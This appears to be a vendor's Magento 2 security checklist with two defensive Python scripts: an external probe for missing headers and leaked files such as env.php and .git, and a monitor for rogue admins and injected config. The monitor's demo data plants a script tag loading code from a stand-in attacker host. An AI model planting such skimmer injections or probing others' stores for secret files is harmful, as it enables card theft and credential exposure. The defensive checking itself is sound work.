This Magento 2 security checklist covers the controls that actually stop real attacks: staying patched against known CVEs, hardening the admin, setting security headers, locking down file permissions, and monitoring for change. Run the free scan to see which items your store already passes and which need attention.
The checklist
1. Patching & versions
- Run a supported Magento / Adobe Commerce version.
- Apply every security patch, not only the headline ones: SessionReaper (CVE-2025-54236), CosmicSting (CVE-2024-34102), TrojanOrders (CVE-2022-24086) and everything released since.
- Confirm each patch is actually present on disk (the patched code is in vendor/ or app/code), not inferred from a version string: a partially applied patch or a hand-edited composer.json leaves the version looking current while the vulnerable code is still deployed.
2. Admin hardening
- Custom admin URL path (the backend/frontName value in app/etc/env.php); never /admin. This only removes you from opportunistic scanning, so treat it as a supplement to the controls below, not a substitute.
- Two-factor authentication enforced for all admins.
- Remove unknown admin users and stale integration tokens.
- Strong password policy and session limits.
3. Transport & headers
- HTTPS everywhere with HSTS.
- Content-Security-Policy, X-Content-Type-Options, X-Frame-Options, Referrer-Policy. Roll out CSP in report-only mode first and review the violation reports before enforcing, so a restrictive policy does not break checkout or payment iframes.
- Valid TLS certificate, with renewal automated so it never lapses.
4. Files & secrets
- No publicly accessible .git, backups, env.php or database dumps. The web root should be pub/, which keeps app/etc/env.php and the rest of the code base outside the document root entirely.
- Correct file permissions; no world-writable code.
- No PHP execution under pub/media, the one directory that accepts uploads.
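The externally-visible parts of sections 3 and 4 can be checked from outside the store. The script below is an added example, not MageArgus code: it fetches the front page and verifies each required header carries a sane value, then probes a handful of paths that must never be served and confirms a 200 is a real leak by inspecting the body (a storefront with a catch-all route returns 200 for everything, so status alone proves nothing). The host, the probe list and the assumed backup file name are illustrative choices, not a complete inventory.

```python
"""External exposure checks for checklist sections 3 (headers) and 4 (leaked
files). Added example, not MageArgus code. The probe paths, including the
assumed dump name /backup.sql, are illustrative."""
import re
import urllib.error
import urllib.request

# Header name -> predicate that the header's value is a usable setting.
REQUIRED_HEADERS = {
    "strict-transport-security": lambda v: "max-age=" in v.lower(),
    "content-security-policy": lambda v: "-src" in v.lower(),
    "x-content-type-options": lambda v: v.strip().lower() == "nosniff",
    "x-frame-options": lambda v: v.strip().upper() in ("DENY", "SAMEORIGIN"),
    "referrer-policy": lambda v: v.strip() != "",
}

# Path -> predicate on the body proving the response is the real file rather
# than a catch-all 200 from the storefront router.
LEAK_PROBES = {
    "/.git/HEAD": lambda b: b.startswith("ref: refs/")
    or re.fullmatch(r"[0-9a-f]{40}\s*", b) is not None,       # detached HEAD
    "/.git/config": lambda b: "[core]" in b,
    "/app/etc/env.php": lambda b: "'db'" in b and "'password'" in b,  # raw PHP source served
    "/composer.json": lambda b: "magento/" in b,               # discloses exact versions
    "/backup.sql": lambda b: "CREATE TABLE" in b or "INSERT INTO" in b,  # assumed name
}


def missing_headers(headers):
    """Return the required headers that are absent or carry an unsafe value.
    `headers` maps header name -> value; names are matched case-insensitively."""
    lower = {k.lower(): v for k, v in headers.items()}
    bad = []
    for name, ok in REQUIRED_HEADERS.items():
        value = lower.get(name)
        if value is None or not ok(value):
            bad.append(name)
    return bad


def is_leak(path, status, body):
    """True when a probe came back 200 with content that proves the file leaked."""
    if status != 200:
        return False
    check = LEAK_PROBES.get(path)
    return check is not None and check(body)


def fetch(url):
    """GET `url`; return (status, headers dict, first 4 KiB of body as text).
    Network failures are reported as status 0 so one dead host does not abort."""
    req = urllib.request.Request(url, headers={"User-Agent": "checklist-audit/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, dict(resp.headers), resp.read(4096).decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, dict(e.headers), ""
    except (urllib.error.URLError, OSError):
        return 0, {}, ""


def audit(base_url):
    """Run both checks against a live store and return the findings as strings."""
    findings = []
    _status, headers, _ = fetch(base_url + "/")
    for name in missing_headers(headers):
        findings.append(f"header missing or weak: {name}")
    for path in LEAK_PROBES:
        status, _, body = fetch(base_url + path)
        if is_leak(path, status, body):
            findings.append(f"leaked file: {path}")
    return findings


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 2:
        sys.exit("usage: audit.py https://shop.example")
    for finding in audit(sys.argv[1].rstrip("/")):
        print(finding)
```

Because `fetch` follows redirects, run it against the canonical https origin; an http URL that redirects will report the headers of the final page, not the redirecting one. PHP execution under pub/media cannot be confirmed from outside without uploading a file, so that item stays an on-server check.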
5. Monitoring
- Scan regularly — exposure changes every time a new CVE drops.
- Watch for new admin users, config changes and injected content.
- Keep tested, offline backups.
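Two of the monitoring items, new admin users and changed configuration, reduce to diffing two Magento tables against a reviewed baseline. The script below is an added example, not the MageArgus module: it runs the detection queries against an in-memory SQLite copy of `admin_user` and `core_config_data` populated with constructed rows, including one rogue admin and a `<script>` tag appended to `design/head/includes`, the config path whose value is rendered into the head of every storefront page and is therefore a favourite place to inject a skimmer. Against a real store the same queries run unchanged on MySQL; the table and column names are Magento's, the sample data and the baseline format are assumptions.

```python
"""Change monitoring for checklist section 5: new admin users and edits to
config paths that inject HTML into the storefront. Added example, not the
MageArgus module. Sample rows and the baseline layout are constructed."""
import sqlite3

# core_config_data paths whose values are emitted as raw HTML/JS on every page.
INJECTION_PATHS = (
    "design/head/includes",
    "design/footer/absolute_footer",
    "design/footer/miscellaneous_html",
)
USER_COLUMNS = ("user_id", "username", "email", "is_active", "created")


def new_admin_users(conn, known_user_ids):
    """Admin accounts whose user_id is not in the reviewed baseline set."""
    rows = conn.execute(
        "SELECT user_id, username, email, is_active, created "
        "FROM admin_user ORDER BY user_id"
    ).fetchall()
    return [dict(zip(USER_COLUMNS, r)) for r in rows if r[0] not in known_user_ids]


def changed_injection_config(conn, baseline):
    """Rows at injection paths whose value differs from the baseline, a dict of
    (scope, scope_id, path) -> value. Rows absent from the baseline count as
    changes; has_external_script marks the ones that warrant immediate triage."""
    placeholders = ",".join("?" * len(INJECTION_PATHS))
    rows = conn.execute(
        f"SELECT scope, scope_id, path, value FROM core_config_data "
        f"WHERE path IN ({placeholders}) ORDER BY config_id",
        INJECTION_PATHS,
    ).fetchall()
    changed = []
    for scope, scope_id, path, value in rows:
        key = (scope, scope_id, path)
        if baseline.get(key) != value:
            changed.append({
                "key": key,
                "old": baseline.get(key),
                "new": value,
                "has_external_script": "<script" in value.lower() and "src=" in value.lower(),
            })
    return changed


def build_demo_db():
    """Constructed sample data: both tables reduced to the columns the checks
    read, with one reviewed admin, one that appeared later, and a script tag
    appended to the head includes after the baseline was taken."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE admin_user (user_id INTEGER PRIMARY KEY, username TEXT,
            email TEXT, is_active INTEGER, created TEXT);
        CREATE TABLE core_config_data (config_id INTEGER PRIMARY KEY, scope TEXT,
            scope_id INTEGER, path TEXT, value TEXT);
        INSERT INTO admin_user VALUES (1, 'admin', 'admin@shop.example', 1, '2023-01-10 09:00:00');
        INSERT INTO admin_user VALUES (7, 'suport', 'suport@mail.example', 1, '2025-10-02 03:14:07');
        INSERT INTO core_config_data VALUES (10, 'default', 0, 'design/head/includes',
            '<link rel="stylesheet" href="/static/custom.css"><script src="https://cdn.attacker.example/j.js"></script>');
        INSERT INTO core_config_data VALUES (11, 'default', 0, 'design/footer/absolute_footer', '');
        INSERT INTO core_config_data VALUES (12, 'stores', 2, 'design/footer/miscellaneous_html', '<p>Store 2</p>');
    """)
    return conn


# Baseline captured at the last review; store 2's footer did not exist yet.
DEMO_BASELINE = {
    ("default", 0, "design/head/includes"): '<link rel="stylesheet" href="/static/custom.css">',
    ("default", 0, "design/footer/absolute_footer"): "",
}


def run_demo():
    """Return (unexpected admin users, changed injection config) for the sample."""
    conn = build_demo_db()
    return new_admin_users(conn, {1}), changed_injection_config(conn, DEMO_BASELINE)


if __name__ == "__main__":
    users, changes = run_demo()
    for u in users:
        print("unexpected admin:", u)
    for c in changes:
        print("config changed:", c["key"], "external script:", c["has_external_script"])
```

Refresh the baseline only after a human has reviewed each diff; an automatic refresh turns the check into a log of what the attacker did rather than an alert. Rows that exist in the store but not in the baseline are reported on purpose, since a new store-scoped override is exactly how an injected footer hides from a default-scope review.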
Check your store against it automatically
You don’t have to audit all of this by hand. The free MageArgus scan covers the externally-visible items — version & CVE exposure, TLS and headers, leaked files and skimmer indicators — and returns a 0–100 score so you can see your gaps at a glance. The on-store MageArgus module covers the internal items: on-disk patch confirmation, file/database malware, permissions and rogue-admin detection.